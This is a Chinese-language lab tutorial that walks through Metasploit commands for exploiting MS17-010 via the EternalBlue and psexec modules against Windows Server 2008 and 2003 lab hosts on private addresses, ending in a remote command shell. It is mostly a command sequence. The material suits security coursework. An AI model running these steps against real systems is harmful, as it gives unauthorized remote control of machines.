Kali虛擬機器利用msf17-010執行RCE提權(針對Windows Server 2008以及2003)
寫在前面:
老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本,否則拿這個去攻擊Windows Server 2003就會出現Exploit completed,but no session was created.這種情況。
ms17-010:exploit/windows/smb/ms17_010_enternalblue —>Windows Server 2008(終端命令)
msfconsole
search ms17-010
useexploit/windows/smb/ms17_010_enternalblue
info(檢視幫助)
set rhosts 192.168.29.128(被攻擊主機IP)
set rport 445
show options
show options以後往下拉會有一個target,因為這裡只有一個0,所以我們不用set target,但是要是有好幾個就需要寫set target 0(選哪個寫哪個的數字)
再開啟一個終端用nmap掃描一下被攻擊主機445埠是否開啟
回到剛才那個終端,輸入exploit,就會創立一個反彈連結,再輸入命令檢視當前使用者以及IP,發現已經是被攻擊的主機的cmd
ms17-010:exploit/windows/smb/ms17_010_psexec —>Windows Server 2003(終端命令)
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_psexec
info
set rhosts 192.168.29.128(設定攻擊目標的IP地址)
set lhost 192.168.29.133(攻擊機ip地址)
set rport 445
set target 0
show options
這裡也需要用nmap掃描一下被攻擊的主機445是否開放,之前掃過了所以這裡不掃了~~~
exploit